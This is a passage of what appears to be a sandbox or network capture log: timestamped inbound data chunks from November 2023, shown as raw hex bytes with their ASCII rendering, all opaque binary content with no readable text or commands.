c1 a1 0e 8a 1e 5f 4f Data Ascii: 7~OJ<}HR.!hz?mnZ\|xPanRu>yi9Pw?SD2+*HEjFd$:}\";R-+\hfR_FsgOj66nb`ZCu~1!y4}boQ'K5]F=1k<Js[qRYg;>_O
2023-11-18 09:02:40 UTC	7628	IN	Data Raw: c7 76 36 7a f6 48 33 e3 c4 27 6a a5 b2 58 71 dd 1e 5c 80 9d 89 9e c1 33 c5 4f 73 9f 32 a0 d4 b5 ec f8 60 40 d5 ea 1f 3b 48 a3 f1 66 53 6e 8b d3 57 3e 55 8d f8 61 de 22 8f 30 94 f3 f9 ce 46 df 22 20 44 b1 84 27 80 53 eb 31 0b df e3 23 be 04 f5 4d ea f5 d1 50 3a 3b 8c f9 48 57 84 b2 50 f7 a7 f0 1c 8b de 77 ab 20 ae eb 8c 46 73 8e 1e d8 11 11 76 74 b5 8a bd 9f 6c af 87 37 44 d9 0d 20 af f8 62 de 69 ec 8e 72 82 4a b7 ab 2b ae 04 51 b9 25 e8 68 c4 d5 4e 03 1a df 35 28 c7 7d d7 8c b4 47 3f 70 95 6f 3c 0a 65 52 43 7d fa 7b b1 e4 71 72 a3 41 49 a0 ca 7d 7f c1 f5 8d 1c 83 54 ef 4b 8d f1 c5 3c 41 02 5f 4e 0c 2e 34 c8 d7 86 fa e7 25 71 99 ef 9c ff 17 4c bb c0 d0 f8 4f 1c 3f d2 98 c8 4b e2 5e ee 37 2c 4e 3e a1 86 87 af a3 f7 f6 a1 eb ef 89 df a3 94 e2 1d 8d d2 88 54 Data Ascii: v6zH3'jXq\3Os2`@;HfSnW>Ua"0F" D'S1#MP:;HWPw Fsvtl7D birJ+Q%hN5(}G?po<eRC}{qrAI}TK<A_N.4%qLO?K^7,N>T
2023-11-18 09:02:40 UTC	7644	IN	Data Raw: 05 5d 7c 37 9f d9 59 05 2b 60 e5 cc c1 06 b1 42 a2 64 8c 69 57 ae da 4d 93 97 57 82 1a 45 a1 b5 0c 84 96 3c dc 34 66 61 51 2c f1 61 1d 9b 90 96 36 c2 18 3f 61 f2 b4 04 a3 65 d0 90 41 34 4b ff 27 ee 7f e2 fe 27 ee 7f e2 fe 27 ee ff 77 71 61 ca ea 10 3d 7b f1 6a 7e a7 2c 86 1d 7d d5 f0 71 93 1a 7e f9 7a 35 5c 37 44 0d 6f 1e aa 86 bd c3 d5 b0 cf a2 86 eb 6f 56 c3 4b 26 a9 e1 17 34 e1 86 c9 6a f8 c6 02 35 5c a2 09 4b 9a f0 80 22 35 9c a5 09 5f 35 4f 0d f7 2e 56 c3 5b 35 e1 67 e7 ab e1 3d 9a b0 c1 a6 c9 bf 4c 0d ff 72 af 1a 7e c0 ae 86 ff a1 09 7f af 09 77 73 aa e1 49 15 6a b8 f1 3e 35 3c 68 a9 a6 cf ff aa 86 f5 4f a9 e1 b5 ff 50 c3 6f 3c a7 86 9f 78 49 d3 3f 2f ab e1 87 34 e1 c2 57 d4 f0 69 4d f8 c5 7f 6a ea f0 aa 1a 3e a4 09 df ba 4e 0d bf a5 09 7f a9 09 9f Data Ascii: ]\|7Y+`BdiWMWE<4faQ,a6?aeA4K'''wqa={j~,}q~z5\7DooVK&4j5\K"5_5O.V[5g=Lr~wsIj>5<hOPo<xI?/4WiMj>N
2023-11-18 09:02:40 UTC	7660	IN	Data Raw: af 1b e0 3a c9 5d 5f 50 10 ed 1d 40 ec 62 ee ea e2 82 e8 28 5c 2d e1 ae 2e 2b 88 76 6f 44 ec 52 ee ea 4a 60 c2 d5 32 ee 6a 4b 41 b4 07 ae 8e e0 ae 6e 28 88 c2 14 ca 1e c9 5d 6d 85 70 c3 88 5d ce 5d 6d 2f 88 0e c0 d5 51 dc d5 1d 38 fd 7a 48 ff 68 ee 7a 47 41 94 af b8 14 67 d8 09 59 00 fa 0a ee 6a 17 a6 27 00 ed e2 ae 77 43 73 8d f5 a5 7b f1 2b 22 fd 03 a3 5c 53 76 e7 17 ae 86 aa 78 02 a9 97 b4 b4 d5 b5 b7 c7 90 ee 04 6e d1 53 b7 2c 19 45 ba 33 2a 70 3f 54 2f c1 8e a7 3b b3 12 77 5b 75 03 77 75 d6 64 dc 8b 54 2c bb 12 d7 2c 52 c7 3a 16 b7 c3 14 a2 bb b0 98 6b f4 0f 89 57 0f ac 1d 4e a5 52 fc 24 9c 7f 48 75 7f 01 c6 56 69 b3 d8 06 1e 0b 10 2c 13 42 30 37 11 b3 1e 0f 12 57 15 e0 6e a8 f9 07 a1 61 e5 0d 6e 26 cf ef 98 72 55 d6 44 e6 f2 fc c3 05 d3 f0 98 30 cd Data Ascii: :]_P@b(\-.+voDRJ`2jKAn(]mp]]m/Q8zHhzGAgYj'wCs{+"\SvxnS,E3*p?T/;w[uwudT,,R:kWNR$HuVi,B07Wnan&rUD0
2023-11-18 09:02:40 UTC	7676	IN	Data Raw: f3 5c c9 4e e3 3c 57 aa d3 38 cf 95 2a 19 e7 b9 f2 1c c6 79 4d 98 96 71 9e 8a e7 62 9c e7 4a 85 c6 79 ae 24 a7 71 9e 2b 55 32 ce 73 e5 29 8d f3 5c d9 6a e3 3c 15 dd 8f 71 5e d3 38 17 e3 bc a6 71 2a e3 bc a6 41 2a e3 bc a6 41 a2 71 5e 73 ba 60 9c d7 94 ee 34 ce 6b 1a e2 34 ce 6b 1a e2 cb 38 6f ed b5 88 c6 79 fe e3 45 e3 bc a6 71 6b 32 ce 3b f5 da 44 e3 bc b5 d7 23 1a e7 ad 3d 5e 34 ce 53 c5 bb 1b e7 79 b1 25 e3 3c 2f aa bb 71 9e 57 94 8b 71 9e 32 44 36 ce 73 25 39 8c f3 54 4c 17 e3 3c 9b ea 6e 9c 67 73 5c 8d f3 6c 8a 8b 71 9e 4d 50 1b e7 d9 b8 87 71 9e 4d 6a 6a 9c 67 53 5d 8d f3 6c 8a 87 71 9e 93 e4 34 ce b3 39 ae c6 79 36 a5 a9 71 9e 4d 55 1a e7 d9 70 53 e3 3c 25 55 36 ce b3 49 cd 8d f3 18 d7 db 38 4f 41 71 31 ce b3 98 ee c6 79 16 c5 d5 38 cf 62 b8 1a e7 Data Ascii: \N<W8yMqbJy$q+U2s)\j<q^8qA*Aq^s`4k4k8oyEqk2;D#=^4Sy%</qWq2D6s%9TL<ngs\lqMPqMjjgS]lq49y6qMUpS<%U6I8OAq1y8b
2023-11-18 09:02:40 UTC	7692	IN	Data Raw: 9d 70 5e df 82 7a ec d2 9d 22 87 2a 18 12 a9 11 24 7d 4b c7 fd 9d 50 f0 2c 81 5c d9 2a a8 88 2d f8 64 72 65 ab c8 e9 6a b0 ba bd 3d c5 7d 84 b9 0e 1e c4 d5 74 bf 7a 50 f7 9b 05 f4 37 5d ee c5 02 1e e6 89 82 df cc ad 13 56 76 79 41 26 f8 cd ac 1d 07 8f 0b 4b 01 c1 6f a6 19 b1 c7 7d a5 80 e0 37 d3 8e f2 ef 76 c1 08 86 ba 04 8c 4b 7d 33 9d a8 31 33 0e c0 3c 7b dd 20 34 ef 77 15 bd 99 29 3c 41 29 2c f5 cd 4c e3 8d 4b 41 a9 6f 66 06 6a 10 bb f2 a4 be 99 5e 54 cc 0b 74 41 ea 9b 99 8b ca 77 a4 44 08 34 bd 99 1f 04 a3 ae d4 37 33 3f 12 e6 52 df cc c2 28 c0 a4 be 99 45 1c 28 fa 42 ec ec b7 9b e0 48 b7 84 ab db 43 b0 70 6d f6 bb e3 e9 3a 8a a9 6e 5f 8c ab 6e 3f e6 84 c6 b9 5d 72 4e ad f8 c3 98 13 5d ce 39 42 75 fb dc 3c 36 83 8a d1 ea f6 b9 3b f9 54 8c 56 b7 cf 7d Data Ascii: p^z"$}KP,\-drej=}tzP7]VvyA&Ko}7vK}313<{ 4w)<A),LKAofj^TtAwD473?R(E(BHCpm:n_n?]rN]9Bu<6;TV}
2023-11-18 09:02:40 UTC	7708	IN	Data Raw: 23 4e 8b 0e 0e 19 a0 0d 4f 12 87 0e 5e 69 80 12 76 ac 83 e6 a4 51 2c c4 b5 ba 36 31 ae 2b 1e 90 76 ce 32 e2 bd 16 83 a0 33 40 67 a7 a4 1d 84 77 31 9c 96 57 1a 3d 59 a3 db 46 7c 4a 96 9f 90 9a 2f 74 e2 2c 3c 87 7c 32 15 51 35 0a 75 ef 4f 85 54 11 63 77 29 bd 21 2d ae 52 e8 c5 98 1a f1 53 5c 3a 90 84 5c 89 86 52 36 ab 54 22 16 0a 26 49 26 01 72 6d 0d 14 19 97 15 90 48 7a 43 21 b0 9b 12 e1 e8 cc 1c 34 09 69 35 4c 11 0b c3 c1 44 d8 4b 71 cd 78 86 66 53 20 90 c2 da 7c e1 98 e6 8d f8 b5 c9 b8 97 e2 ad 51 94 90 f5 25 c6 c7 a0 65 7d 89 44 94 85 ef 05 47 95 98 37 94 12 c4 60 a3 49 7b 7d be 54 38 45 d1 fc b4 68 2a 39 15 65 81 20 e3 58 84 53 30 40 3c 1a 8a 4e a5 54 2d 95 60 21 34 a3 33 2a b4 9a b4 1a 0b d6 d0 6d 26 4d f5 87 54 2f 82 2e a1 c8 54 62 5a 37 13 b4 9b 30 Data Ascii: #NO^ivQ,61+v23@gw1W=YF\|J/t,<\|2Q5uOTcw)!-RS\:\R6T"&I&rmHzC!4i5LDKqxfS \|Q%e}DG7`I{}T8Eh9e XS0@<NT-`!43m&MT/.TbZ70
2023-11-18 09:02:40 UTC	7724	IN	Data Raw: cd c6 08 ae 27 42 ff ae 72 29 94 3b 9f 6a 71 86 d5 4e a5 50 5a 4e 7b f3 1a 00 97 1b 03 dd c3 c7 5b 1a f1 9c 40 6b 9b 7c 7e 89 58 da 98 84 98 ab 0b 71 8f 10 e2 f4 61 8f 7f a8 10 22 33 46 0a 31 ce 9a 9a 19 63 12 62 9c b5 28 54 88 71 d6 9e 21 42 5c 62 12 22 fd 67 85 b0 a9 34 fd 16 18 a2 34 ca 63 4a c6 bb 70 2e 64 b9 d3 e3 ff ae 98 64 59 d3 91 b1 c2 46 8a 48 25 ef f0 44 c6 7a c2 15 09 81 ba 70 21 d0 4e 10 1e 84 2b 94 52 75 e1 42 aa f2 24 64 0e e7 46 8b 97 f1 38 62 ec 9e cc d8 16 90 3a 52 b3 72 0f 17 4d a7 b4 ec 58 99 4b 16 21 ba 2d d6 93 5c b4 ae d2 f2 d4 ca 8e 0b 88 ab 1b 4f 91 84 dd 2b dd a4 b0 40 70 13 61 4f 1a ec 68 38 77 63 13 cc 90 cb 19 2f e7 51 5e ce d8 a6 74 c6 7a a4 4b 3a e3 dd b9 83 e6 df 4f da 33 36 1e ce 5d af 53 53 a8 67 9c cc 61 ec 3a b8 dc 25 Data Ascii: 'Br);jqNPZN{[@k\|~Xqa"3F1cb(Tq!B\b"g44cJp.ddYFH%Dzp!N+RuB$dF8b:RrMXK!-\O+@paOh8wc/Q^tzK:O36]SSga:%
2023-11-18 09:02:40 UTC	7740	IN	Data Raw: 54 30 c2 34 4c f5 2c 62 f2 c7 c3 f0 9a 74 3d 18 8a e5 f3 e4 37 32 45 f7 7e ea ec 75 1b ed ad 3d 6e e1 06 9f 0c 43 a5 26 e0 6e c2 b3 ce a7 c3 90 84 0f c4 1c f5 b3 61 a8 e6 42 7f 3e 5c ba 6a 9b 1e 4a a8 fa 2f 86 61 93 98 4c ff 32 3d dd 83 71 45 bb 3b b0 08 63 f6 74 1e f9 b7 11 84 4b e7 99 ff f3 6d d2 8b 56 e6 df bf 4d 62 d1 40 5f 8d 20 10 9e e6 00 d0 4d fc f4 48 e8 9a 3f 4a ff fa db 94 43 38 f9 99 6f 53 0a 11 e4 1f 23 08 e2 6e 69 c1 fe c2 9d 34 4a 0a d2 98 bc 33 1e 07 dd d9 09 60 32 2b fe 0e b1 98 ea 4c fa 36 e1 97 a8 18 e2 f3 06 63 19 41 38 7d 31 0d d5 e8 81 cf a7 fd b3 9b df 8c ce 5a 0a eb ff 25 36 53 69 32 be 4b 3c a6 52 65 7e 97 f0 a6 f4 b3 d2 87 8f 06 e5 f1 20 7c 40 43 ff 64 1b 9e cd fb 33 63 d8 65 ff a6 88 fd e2 f1 cd 93 60 0e 79 f8 50 5e d5 dd 1c d0 Data Ascii: T04L,bt=72E~u=nC&naB>\jJ/aL2=qE;ctKmVMb@_ MH?JC8oS#ni4J3`2+L6cA8}1Z%6Si2K<Re~ \|@Cd3ce`yP^
2023-11-18 09:02:40 UTC	7756	IN	Data Raw: a4 f5 24 f2 3f 09 dc 8f 46 e2 df 8f 94 90 d6 6b 4a 48 eb b4 25 31 2b d6 d4 a6 0c d2 4d e0 5f 53 d5 0e bc 16 ee 6b 69 2f b3 62 4d ab 28 00 e8 54 64 56 ac e9 39 e8 0d c9 b8 cc 8a 35 23 01 c5 ac 8c c4 ac 58 33 2b 69 0c b1 07 a8 76 0b 50 d4 24 27 33 2b d6 ec 56 a8 34 17 60 56 ac 39 55 9f 12 6f 02 99 15 ab cb 8d fb 98 15 6b ae 1b 2f 32 2b d6 3c 0c 54 5b e6 b4 a5 f3 17 4e 23 b1 bf 6c 81 e6 96 30 2b db fa 40 7a 2b 9f bb cf d8 17 37 37 e3 c9 ec 11 e9 95 81 2e d1 65 5f 81 b9 9c 0f f4 b2 67 62 38 09 ab 1f 7d 21 89 35 1f 65 82 8d b1 bb 5b af 15 21 dc f5 ec 05 c5 90 60 63 ec 85 0d 83 d4 8d 15 f7 0b 7b 51 03 ec 16 39 25 1b 63 2f 76 fb ec 67 63 ec 25 c5 84 8f 8d b1 7b 2e fc 06 f5 25 bc 6c 8c bd b4 f1 0e 53 7a a3 a2 f4 a5 67 bf 98 5e 63 05 b1 19 99 70 d3 33 34 b1 af 7c Data Ascii: $?FkJH%1+M_Ski/bM(TdV95#X3+ivP$'3+V4`V9Uok/2+<T[N#l0+@z+77.e_gb8}!5e[!`c{Q9%c/vgc%{.%lSzg^cp34\|
2023-11-18 09:02:40 UTC	7772	IN	Data Raw: 33 84 b5 9b 33 4e 2e 9c 2b e4 7f 21 fa 7b 9b c0 82 44 5b b7 4d 2e 74 fe d8 c2 b9 07 63 b2 e1 cf dd 64 18 23 f4 ee 86 39 36 58 ed 18 c6 57 df 6e 1a 5f 89 7e 8d d0 12 e3 2d 72 e1 e0 1d a6 51 8d 7e 75 6e 38 44 8b f7 7d 24 aa b7 39 d6 5c 88 2e d0 bd 14 05 ee 89 84 d1 be 8b a4 0a 9f 5c 38 67 18 63 1f 8a 82 4f 1c 32 8c 43 37 51 a1 ef 02 f9 23 6f e5 9a 44 1f ff 7c 24 5b b9 75 d1 ef dd 7f 4a 9c c8 35 1d 5f 65 85 f2 61 87 9b e4 29 fe 23 2a 56 88 9f 62 e2 c2 e9 8b 94 89 c4 9d 67 48 07 98 4e fc bc e4 2e db 62 67 3b ba cd c8 49 82 85 bd c7 30 5d 87 fc f3 44 f4 58 b7 46 bf c6 76 45 ae cf 44 81 ef 27 15 36 e7 49 4d cc 75 c6 d8 d1 48 f9 8b 48 69 d0 4a e6 fb 4a b3 c6 e4 99 28 f8 8f 87 62 a6 db 2b 84 38 4a 5b 51 59 df 4a 5c 8b 6e ca 93 9c 3a 7e 3c 46 32 1e bf e3 f4 c5 e3 Data Ascii: 33N.+!{D[M.tcd#96XWn_~-rQ~un8D}$9\.\8gcO2C7Q#oD\|$[uJ5_ea)#*VbgHN.bg;I0]DXFvED'6IMuHHiJJ(b+8J[QYJ\n:~<F2
2023-11-18 09:02:40 UTC	7788	IN	Data Raw: 38 d8 0d 47 96 ea d4 24 8f de 6d 5d dd ce 4e ca 5b eb a4 c5 f7 32 ec 48 0f ea a2 27 59 4f 50 4d 93 91 22 52 52 0c 1f 99 b1 63 7a 9c 3a 2d a1 4b d5 38 e2 6d a1 c6 3e 02 87 db 2d a6 37 35 27 b1 8c 9c a8 ad 33 74 69 03 fd 42 ef d4 21 9b 3f 55 5b 75 51 52 97 d6 eb a2 13 6c c3 5a 8a 49 0e 3f 03 37 88 14 5e 8d 30 a9 c3 b7 20 4c f4 12 0c d5 74 53 b4 35 ae ab a4 56 e8 43 d4 f3 76 da c6 6a 5c 3d b5 23 c1 ca 8f 2a 80 d5 22 d1 8d 46 a3 35 bc e2 84 b0 7b 6a a3 ae cc dc 00 43 90 4a 5d 6c f1 ec 14 03 5c d7 c1 bc 26 98 81 8c 35 02 02 57 b1 0a 21 b6 15 fe 59 e0 d7 b1 82 78 51 71 5c ec 05 02 c7 a3 30 49 2b d3 c5 47 74 85 7a 7a 17 4e bf ad 65 3f a9 ea d3 76 82 b7 9a 6c 28 1a 69 0c 62 62 b8 c6 3b d6 3a 78 13 73 92 a4 a1 16 4f 8b d1 62 ca 86 75 e6 69 72 3e 87 08 76 79 8f 0e Data Ascii: 8G$m]N[2H'YOPM"RRcz:-K8m>-75'3tiB!?U[uQRlZI?7^0 LtS5VCvj\=#*"F5{jCJ]l\&5W!YxQq\0I+GtzzNe?vl(ibb;:xsObuir>vy
2023-11-18 09:02:40 UTC	7804	IN	Data Raw: b3 7e d5 96 55 6b 68 74 69 c6 5a d7 b4 fb 36 e7 7a b1 b4 95 be b1 6a 83 fb f5 56 b7 aa 6c e5 b1 58 1d fd 5b b7 66 cd 94 f3 62 d3 62 f5 75 1b 5a 57 53 a2 6e cd a6 b6 54 eb ba 3a 00 58 dd 9a 1d eb b6 b5 b6 c5 96 0c 34 8a 42 b9 41 36 4d f2 be ef 92 4b af a8 9d bd a4 b6 21 36 ed ec d8 d4 dc d7 06 47 00 ba 3b 37 b5 79 07 60 43 7b 4b cb 75 ad ef 3b 2b 3b 90 9b 53 9b b6 6c 5c 85 27 0c d8 ad 80 cf 8e 36 4f c2 94 e3 9b 72 52 38 78 b9 66 fd ca f4 76 82 ac 35 9b 36 6c a0 1e cb 1d 3a 1d 1b 36 f8 5a db b7 af 6d 5d d7 9a 36 56 54 d4 cd ad 3e 53 fb b6 d5 1d 29 b6 3a 6b df 99 5f e3 06 02 98 85 ab 79 9a f2 80 d1 5c cc e3 89 65 1f 02 9c 57 6d f4 b5 6c df bc 72 5b eb da f4 7a df 4a c6 47 3e 84 2a f3 dd de ba ae 0d 16 83 1b 5a da bc 6d 59 b9 32 3d 7f 6a c3 b9 2b 1b 3c 9f 24 Data Ascii: ~UkhtiZ6zjVlX[fbbuZWSnT:X4BA6MK!6G;7y`C{Ku;+;Sl\'6OrR8xfv56l:6Zm]6VT>S):k_y\eWmlr[zJG>*ZmY2=j+<$
2023-11-18 09:02:40 UTC	7820	IN	Data Raw: 62 5e b8 67 d2 5e be 24 53 47 82 a2 b9 2b 9f 1d 60 c5 09 05 e1 0e 1c 29 c6 14 58 16 89 36 ca 55 53 cd f8 89 c1 b5 aa 83 9d 4e 63 bf e9 b6 e3 ed 72 18 d6 33 69 31 33 4c 2b 5b 97 63 4e d7 d7 e5 5b 9e f5 4c 3a c6 f6 7d 5d be e5 5a cf 24 2f 0b 5f 86 ae ce 6f 53 6b 6e 55 65 ab 1f a9 89 77 23 32 1c af 35 cd 10 b4 b4 b5 18 be 8e 92 f6 e3 66 70 f4 df 49 74 79 0e 78 38 8a f7 3d 45 55 8b aa e5 83 30 54 ce 45 f1 c5 3c 1b c0 be bb fc df 1e 1b 80 3e 3f ca 81 20 6e 70 02 67 b3 a5 47 07 82 d8 e8 04 c2 da b3 2d 4a 8f 00 7e e9 84 1d 54 f4 b0 18 27 04 31 35 c7 06 e2 e5 96 c4 ad fb 62 ee 9e c5 2d c6 09 71 4b bf 2c 6e 31 52 88 db e5 70 b8 3e 65 b8 b0 9f 79 bc 3f 66 86 08 6b 7c 6b 27 a9 0d ac 6d a4 56 3f 7e 0b 2f 79 6f b1 e3 83 35 be 35 94 d4 9a e1 01 68 67 74 b0 c6 b7 56 93 Data Ascii: b^g^$SG+`)X6USNcr3i13L+[cN[L:}]Z$/_oSknUew#25fpItyx8=EU0TE<>? npgG-J~T'15b-qK,n1Rp>ey?fk\|k'mV?~/yo55hgtV
2023-11-18 09:02:40 UTC	7836	IN	Data Raw: eb 51 27 28 5a be 6d 0c 09 6d 65 0a cc b4 34 ea 29 99 9b 51 97 e6 3b 14 d8 0e 1b 5a ed 70 dc d0 b0 d0 f0 a1 f5 d0 1e 03 83 87 86 86 eb 2d 32 77 cc 6c 67 b4 04 db 8b 7f af e7 6a f7 5c 6b b1 33 5b 8b db 73 5b cc 6c 2d 76 79 ad 45 7b 61 6b 29 9d d7 5a b4 17 6e 8d 1e 2f d9 1a e6 9a ee ca 5b d3 c0 98 90 90 e0 a8 fc 7b 9c 1a 0d 37 b0 7b f9 1e a7 be 2a 49 b7 93 fb 8e ba ec 25 c1 4e 33 87 e7 c6 28 fc 7e 51 99 39 6c d3 1f 06 60 89 ba 12 a6 0b 89 43 21 fd 8e 2e 56 3d ea ca 98 87 94 51 27 55 73 28 a3 8e 48 83 ec 65 c6 57 7d 8e b0 97 3d 40 24 fe f8 93 a6 9a 02 f9 83 32 89 85 f4 bb af 58 99 75 90 d1 0e b2 66 f5 a5 6a bc 83 9c ea 28 fe 38 49 f2 73 21 f3 11 a9 a6 3c c4 1f 5f 90 d8 17 d6 8f 88 96 a8 73 bf cd 49 5a 43 4e 91 f4 53 3f 9a 73 92 12 a6 7e a2 e0 24 97 70 9a fa Data Ascii: Q'(Zmme4)Q;Zp-2wlgj\k3[s[l-vyE{ak)Zn/[{7{*I%N3(~Q9l`C!.V=Q'Us(HeW}=@$2Xufj(8Is!<_sIZCNS?s~$p
2023-11-18 09:02:40 UTC	7852	IN	Data Raw: ea 54 d1 3d be a5 76 be 8d d2 4c 71 47 55 12 b9 f6 25 b6 3c f7 13 b9 6e 8d 7c d6 5d 5b 5a 2d ee ae 15 e4 f2 79 6c 97 f8 2f db 1a cf 12 b1 70 f3 e1 1b 44 1a cd 6c 2d fe 40 64 f4 75 d6 65 d8 4d 3d c1 c5 92 a5 bb 05 41 e0 c6 d7 2a 22 76 ae 0d af 26 d2 c0 b5 46 3e 91 23 4b d9 3e b6 8d c8 a5 95 2c b9 8f 88 f4 b5 d5 e8 59 13 91 49 2e 9f 1e 22 61 ae 7d 8e ec 56 8e af df 10 f1 73 69 c2 bb 95 fd 67 41 1d cd 48 5c 4c cf 24 72 37 77 7d b1 92 c8 ba 7e b6 84 79 44 c6 b8 16 db 5c 27 ed 70 27 b5 7c 15 91 d6 c4 d8 c8 a5 30 7b 6a fc bc fd 07 94 e6 43 6e 1d fb 71 22 47 e5 75 6c 57 69 b1 cf 57 59 2a f8 b9 9c 7f 55 a7 ac c5 eb 44 42 a9 dc 99 03 91 09 6e 54 26 ef a1 79 9e 8b ce d9 7b 94 f9 5c 44 e4 67 dc 6f 5c 2e 91 43 5c 6b b8 88 b4 71 b3 fa ae 3d b1 fd 77 a2 33 09 11 13 d7 Data Ascii: T=vLqGU%<n\|][Z-yl/pDl-@dueM=A"v&F>#K>,YI."a}VsigAH\L$r7w}~yD\'p'\|0{jCnq"GulWiWYUDBnT&y{\Dgo\.C\kq=w3
2023-11-18 09:02:40 UTC	7868	IN	Data Raw: 31 69 db f8 51 a7 69 d0 9a b1 79 92 b0 da 16 ec c2 01 30 e6 2f 10 f4 5d 0a d9 4b 12 d6 2e a5 9e bc 35 64 3b 87 1e 4f 10 1f 5e 2b 7b ba e9 5b 5a 0e 74 0b 5f 1f cf 6a e8 ea 68 3c 9f 53 b8 4b b8 ae 5b 5c b7 be 1e b0 2e b9 df 75 64 67 2f a7 ad 2f f0 e9 31 9c 56 57 bf cb fa b2 11 5f 3e f3 1d ec 49 da c1 fa dd 7c 32 dd 30 52 91 76 41 73 82 73 4c 8f b7 f5 a6 3f 60 04 b6 0e 57 48 4c c8 ef d4 17 57 c2 7d 8d ce b9 f4 da a7 42 72 04 e2 76 e8 e5 6c 62 63 16 a7 37 31 fe df 09 0c f1 c6 62 1e ff 92 22 e3 1b 0a c7 a7 f7 85 15 d6 a7 f7 6d e9 5b ea ee c5 b9 7b 54 4b d6 2d f5 a5 85 7d ef 51 25 15 92 fd 99 42 2c f4 05 92 fc eb 22 bc 05 0c 7d 51 a5 74 a7 22 93 b0 65 7f 66 d2 86 e3 ff f1 2e 86 60 f5 1b 38 a2 97 77 5d 32 9c 04 2b 32 0b 0c f3 d5 64 70 91 c4 32 be 82 f2 e0 db 96 Data Ascii: 1iQiy0/]K.5d;O^+{[Zt_jh<SK[\.udg//1VW_>I\|20RvAssL?`WHLW}Brvlbc71b"m[{TK-}Q%B,"}Qt"ef.`8w]2+2dp2
2023-11-18 09:02:40 UTC	7876	IN	Data Raw: 19 8a fb 2f 67 e9 11 59 37 88 9d 25 9f 8b 0f 50 c7 e1 2c d9 41 21 6a 14 92 6c 08 e3 e8 f7 6f c0 d7 33 6c b7 34 ac 9e c3 c2 54 0d 05 3d 39 0a 39 43 d9 be 2b 53 f0 54 d0 4f 63 a5 e1 78 9c cf 8f c4 49 7f 61 ba 91 da 1c 07 9a ef 54 8a 73 0b 93 4c d4 b0 1e 50 c3 69 34 7c d6 ed 3e 59 1e 0d 4b 4c 62 7d 62 d2 7d 02 31 21 79 e4 9d b8 24 89 48 0d 56 91 62 8b 8c 03 1d ce ac 49 5f 45 a4 ff 7b 02 d2 af 8a ab 74 1c 17 67 d3 24 84 d3 71 50 38 1d 00 cd 8c fd c0 fe 2f 4e be ab ed 7e a2 45 25 9b 70 1d 68 a8 e7 c0 38 55 9a 18 e3 77 c1 d2 eb a2 8f 5f 8b a0 83 47 64 e6 65 77 cd c9 ef e3 71 83 90 35 88 c6 74 2e 56 da b1 57 e7 ae 21 e9 bd 73 62 c2 90 1a de 2b d1 90 8a 69 43 6a 50 af 64 1a 52 a3 0d 43 ea 68 02 12 4e ec a5 03 4f 17 30 e6 0b 3c 06 b1 83 9b 21 82 fd ba 9f fd e6 b8 Data Ascii: /gY7%P,A!jlo3l4T=99C+STOcxIaTsLPi4\|>YKLb}b}1!y$HVbI_E{tg$qP8/N~E%ph8Uw_Gdewq5t.VW!sb+iCjPdRChNO0<!
2023-11-18 09:02:40 UTC	7892	IN	Data Raw: 4c a2 c1 f9 e9 8c 4e 4e d9 12 b3 42 43 91 71 b1 17 88 da d1 57 68 b0 c2 12 90 6c c7 79 18 57 12 38 d2 ee cd 47 dd ce 55 70 43 ef cb 47 15 50 2b ab 0c 48 22 17 0f ca e0 0b d5 8f a8 56 36 2d c5 3d 51 18 86 45 8c b0 77 62 8e 6c 24 21 ea 05 dd bb cd dc 3c aa 85 9f b3 9c 0c 99 a0 bf df cb d7 f0 e3 05 51 1c 05 6d 84 32 91 35 73 65 cf bb 65 ff a2 1e 2f 20 db 4b 94 21 15 f3 f1 a0 3f 17 80 c2 8d 26 5a a0 89 b2 fc 14 f9 d5 1f 5a c2 a3 8c 63 e0 82 85 7c b1 65 99 0c 84 9b 23 03 e1 72 e1 48 e8 2d 63 d0 e6 30 11 76 45 ae aa 16 d7 8b 20 57 74 72 d0 28 87 c3 72 a0 71 14 10 8c f1 81 18 2b e7 11 7f 5d 65 27 e2 c9 11 67 7c 40 01 a1 e0 47 e2 15 c6 39 6d a0 49 d4 cb 53 62 57 54 e1 0d d9 f3 43 f8 23 88 e1 90 f1 24 68 82 ff 5a e7 67 f8 21 0a 4b a9 5a 35 3c b2 04 67 f8 e1 a8 dc Data Ascii: LNNBCqWhlyW8GUpCGP+H"V6-=QEwbl$!<Qm25see/ K!?&ZZc\|e#rH-c0vE Wtr(rq+]e'g\|@G9mISbWTC#$hZg!KZ5<g
2023-11-18 09:02:40 UTC	7908	IN	Data Raw: 14 77 fe 12 01 ef fe b9 bf 9f 97 bc 3f 46 0c 6c 6a 39 20 f8 8a 0e fd 77 6c 14 ec f7 9d a5 d4 49 44 da 00 3e ef bb 88 88 cf eb bb 44 c2 4d 3f 5f 5c d8 b2 0f d0 64 b4 90 a9 7b f6 b1 69 29 3a bf 72 c7 be 8b 87 e9 3a 1a 3e 17 50 88 bd 9f b3 60 d0 9f 2f 1b a0 03 5e ff fc e2 46 67 cc 39 ec 06 36 fa 4f 1e a0 f5 a9 85 7a 2a 2c 04 ab 7d ca 37 b4 61 d1 c5 4b 43 8f b3 80 da e8 a8 e0 88 ff fc 17 cc 5c c3 8d 5e 86 6d ce 3c 3a 90 c0 b1 4e ac 3f e1 d4 45 f8 e4 66 53 e8 2e 2f 1b 4b fb 1e df 03 c5 df d6 ef 7f f2 13 3a 0d 68 65 93 c3 ae 09 e0 c7 93 d0 58 55 74 11 c9 d7 fa 11 70 e6 4e 46 3a 87 91 ba 3f a6 f2 35 0f d7 74 6b b7 16 ce b9 c0 6f a9 e5 ed 42 18 73 f5 ae e5 8d b3 47 cf fe 56 e3 ec 65 18 56 b1 b9 c3 23 df 8a f3 c1 67 e9 a2 bb ef f6 3d c1 76 f0 1c 19 e7 5b fe d5 05 Data Ascii: w?Flj9 wlID>DM?_\d{i):r:>P`/^Fg96Oz*,}7aKC\^m<:N?EfS./K:heXUtpNF:?5tkoBsGVeV#g=v[
